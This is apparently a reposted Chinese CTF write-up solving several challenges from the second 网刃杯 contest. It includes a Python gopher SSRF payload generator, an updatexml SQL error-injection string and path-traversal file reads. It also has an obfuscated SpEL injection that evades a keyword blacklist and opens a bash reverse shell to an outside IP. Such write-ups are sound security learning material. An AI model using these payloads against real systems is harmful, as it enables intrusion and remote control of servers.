第二届“网刃杯”网络安全大赛 部分writeup
发布时间:2024-12-22 09:01
第二届“网刃杯”网络安全大赛 部分writeup
- ICS
-
- easyiec
- web
-
- sign_in
- upload
- ez_java
- Misc
-
- 玩坏的winxp
本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主:https://blog.csdn.net/weixin_46081055 看看ヾ(@ ˘ω˘ @)ノ!!
ICS
easyiec
流量包直接看到
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/7727b66f68ca4ef7ac27ea946738b18e.jpg\")
web
sign_in
File协议读hosts,得到IP扫描内网,发现172.73.24.100有一台主机
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/b1081b53be8a4a5eb173a9a830d9f4cb.jpg\")
根据提示打ssrf(这里我如果b赋值数字gopher就是打不了,我真的不明白)
import urllib.parse
payload =\\
\"\"\"POST /index.php?a=1 HTTP/1.1
Host: 127.0.0.1:80
X-Forwarded-For:127.0.0.1
Referer: bolean.club
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
b=abc
\"\"\"
tmp = urllib.parse.quote(payload)
new = tmp.replace(\'%0A\',\'%0D%0A\')
result = \'gopher://172.73.24.100:80/\'+\'_\'+new
result = urllib.parse.quote(result)
print(result)
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/c4e7f77586d34a4cb8e367b59b21007d.jpg\")
flag{Have_A_GoOd_T1m3!!!}
upload
是sql报错注入啊…我确实对着文件名fuzz好久没出来
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/458f9be8c20743bfbc43eaa85bbd3277.jpg\")
1.png\' and updatexml(1,concat(0x7e,(select substr(flag,1,16) from flag),0x7e),1) and \'
要注意让sql语句闭合,flag表是不是猜出来的…我只看到一个upload表
ez_java
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/6bda8b4c64a2451cba9c56f7e6652cb3.jpg\")
任意文件读取,web.xml泄露
/download?filename=../../../web.xml
得到
<web-app xmlns=\"http://xmlns.jcp.org/xml/ns/javaee\"
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xsi:schemaLocation=\"http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd\"
version=\"4.0\">
<servlet>
<servlet-name>DownloadServletservlet-name>
<servlet-class>com.abc.servlet.DownloadServletservlet-class>
servlet>
<servlet-mapping>
<servlet-name>DownloadServletservlet-name>
<url-pattern>/downloadurl-pattern>
servlet-mapping>
<servlet>
<servlet-name>TestServletservlet-name>
<servlet-class>com.abc.servlet.TestServletservlet-class>
servlet>
<servlet-mapping>
<servlet-name>TestServletservlet-name>
<url-pattern>/test388url-pattern>
servlet-mapping>
web-app>
下载两个类文件
/download?filename=../../../classes/com/abc/servlet/TestServlet.class
/download?filename=../../../classes/com/abc/servlet/DownloadServlet.class
看TestServlet.class,有个spel注入,可以看Rui0师傅讲得http://rui0.cn/archives/1043
public class TestServlet extends HttpServlet {
/* access modifiers changed from: protected */
public void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
doPost(req, resp);
}
/* access modifiers changed from: protected */
public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
try {
String name = new String(request.getParameter(\"name\").getBytes(\"ISO8859-1\"), \"UTF-8\");
if (blackMatch(name)) {
request.setAttribute(\"message\", \"name is invalid\");
request.getRequestDispatcher(\"/message.jsp\").forward(request, response);
return;
}
System.out.println(name);
request.setAttribute(\"message\", getAdvanceValue(name)); //name可控
request.getRequestDispatcher(\"/message.jsp\").forward(request, response);
} catch (Exception e) {
request.setAttribute(\"message\", \"error\");
request.getRequestDispatcher(\"/message.jsp\").forward(request, response);
}
}
private boolean blackMatch(String val) {
for (String keyword : getBlacklist()) {
if (Pattern.compile(keyword, 34).matcher(val).find()) {
return true;
}
}
return false;
}
private String getAdvanceValue(String val) { //这里是spel执行的地方
return new SpelExpressionParser().parseExpression(val, new TemplateParserContext()).getValue(new StandardEvaluationContext()).toString();
}
private String[] getBlacklist() { //有过滤,利用反射构造绕过
return new String[]{\"java.+lang\", \"Runtime\", \"exec.*\\\\(\"};
}
}
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/cc3df1a11749493a9ec6005383af08fd.jpg\")
payload(注意需要url编码)
name=#{T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"ex\"+\"ec\",T(String[])).invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"getRu\"+\"ntime\").invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\")),new String[]{\"bash\",\"-c\",\"/bin/bash -i >& /dev/tcp/180.76.184.229/9999 0>&1\"})}
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/ab9f6cf418314116badad9df8dd1e8b0.jpg\")
![\"请添加图片描述\"](\"https://img.it610.com/image/info8/dff9b470a5f4414495c40c348739b018.jpg\")
Misc
玩坏的winxp
桌面上有meiren.png
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/d48c3f9a1c64444d800991abb38aec42.jpg\")
取下来binwalk分离,得到压缩包解压出f1ag.png,再binwalk一次,得到一个加密压缩包
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/b8e45795c998429d80825034cf8d8598.jpg\")
本来以为这个戴围脖的软件是火狐浏览器,我真的是思路清奇,然后就卡着了
赛后看了师傅们的wp知道从qq入手,有点社工思路
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/d22e73af35e54e9e8cfa46a6ac59b0a1.jpg\")
访问他的qq空间留言板,得到密码md5 dc45445a8a099e63fbb9b8480d57723a,解压密码为xiaomin520
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/564726e5b89f4f9b9c9f1a7d33651d0e.jpg\")
得到flag
![\"第二届“网刃杯”网络安全大赛](\"https://img.it610.com/image/info8/f5759fb90a5247b18cbd4fd7c7de6b60.jpg\")
参考wp:https://blog.csdn.net/qq_53263789/article/details/124430442
https://mp.weixin.qq.com/s?__biz=Mzg2ODc1ODgzOQ==&mid=2247483772&idx=1&sn=0015b5a2b5db1636807b0bc4074cc5b1&chksm=cea62524f9d1ac328bb2c98d30d3b8b45a5e3cb2a31ab02232b2030eadfa1f6031db5f1a4ad3&mpshare=1&scene=23&srcid=0425zchIWRTnxXKiLSCNNWQB&sharer_sharetime=1650893619252&sharer_shareid=338e6bdd46dd97be28409a9b4d925212#rd